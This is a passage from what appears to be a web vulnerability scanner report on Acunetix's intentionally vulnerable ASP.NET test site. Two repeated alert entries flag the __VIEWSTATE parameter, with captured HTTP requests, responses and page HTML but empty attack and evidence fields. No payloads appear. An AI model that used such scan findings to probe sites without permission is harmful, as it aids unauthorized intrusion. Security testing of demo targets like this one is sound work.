Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1105 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,105 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8250&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDA2RvjdNoIZGRksYBT9bLdBu03VDkIq1sy1ChoZac%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKbzft%2FApyKwu8BAuKJ2soFAvuknccMAvuknccMAvuk8awJAvuk8awJAvuk5cMCAvuk5cMCAtzL9%2BgFAtzL9%2BgFAtzL648NAtzL648NAtzLn6IGAtzLn6IGAtzLs%2FkPAtzLs%2FkPAtzLp5wHAtzLp5wHAtzL2zAC3MvbMALcy8%2FXCQLcy8%2FXCQLcy%2BPqAgLcy%2BPqAgLcy9fTDwLcy9fTDwLcy8v2CALcy8v2CAKx0tWfCgKx0tWfCgKx0smyAwKx0smyAwKx0v3JDAKx0v3JDAKx0pHsBQKx0pHsBQKx0oWDDQKx0oWDDQKx0rmmBgKx0rmmBgKx0q39DwKx0q39DwKx0sGRBwKx0sGRBwKx0rX5BQKx0rX5BQKx0qmcDQKx0qmcDQKK%2BbsFAor5uwUCivmv2AkCivmv2AkCivnD%2FAICivnD%2FAICivn3kwoCivn3kwoCivnrtgMCivnrtgMCivmfzQwCivmfzQwCivmz4AUCivmz4AUCivmnhw0Civmnhw0Civmb7AsCivmb7AsCivmPgwMCivmPgwMCv5P7xAkCv5P7xAkCv5PvmwECv5PvmwECv5ODvgoCv5ODvgoCv5O31QMCv5O31QMCv5Or6AwCv5Or6AwCv5PfjAQCv5PfjAQCv5Pzow0Cv5Pzow0Cv5PnxgYCv5PnxgYCv5PbrwMCv5PbrwN97LHzRUTNTxQYHiaSCwVzTX3KcA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:50 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDA2RvjdNoIZGRksYBT9bLdBu03VDkIq1sy1ChoZac=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKbzft/ApyKwu8BAuKJ2soFAvuknccMAvuknccMAvuk8awJAvuk8awJAvuk5cMCAvuk5cMCAtzL9+gFAtzL9+gFAtzL648NAtzL648NAtzLn6IGAtzLn6IGAtzLs/kPAtzLs/kPAtzLp5wHAtzLp5wHAtzL2zAC3MvbMALcy8/XCQLcy8/XCQLcy+PqAgLcy+PqAgLcy9fTDwLcy9fTDwLcy8v2CALcy8v2CAKx0tWfCgKx0tWfCgKx0smyAwKx0smyAwKx0v3JDAKx0v3JDAKx0pHsBQKx0pHsBQKx0oWDDQKx0oWDDQKx0rmmBgKx0rmmBgKx0q39DwKx0q39DwKx0sGRBwKx0sGRBwKx0rX5BQKx0rX5BQKx0qmcDQKx0qmcDQKK+bsFAor5uwUCivmv2AkCivmv2AkCivnD/AICivnD/AICivn3kwoCivn3kwoCivnrtgMCivnrtgMCivmfzQwCivmfzQwCivmz4AUCivmz4AUCivmnhw0Civmnhw0Civmb7AsCivmb7AsCivmPgwMCivmPgwMCv5P7xAkCv5P7xAkCv5PvmwECv5PvmwECv5ODvgoCv5ODvgoCv5O31QMCv5O31QMCv5Or6AwCv5Or6AwCv5PfjAQCv5PfjAQCv5Pzow0Cv5Pzow0Cv5PnxgYCv5PnxgYCv5PbrwMCv5PbrwN97LHzRUTNTxQYHiaSCwVzTX3KcA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:White" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8266&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAdcJ1gdoIZGRkWoxJqUfrQTB5nzMU83Sk5BzPyGA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL8i6zwDQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DVjWBtUGn%2FH%2F4v8KvNgbNM0J7vHE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:26 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAdcJ1gdoIZGRkWoxJqUfrQTB5nzMU83Sk5BzPyGA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL8i6zwDQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DVjWBtUGn/H/4v8KvNgbNM0J7vHE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:White" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and 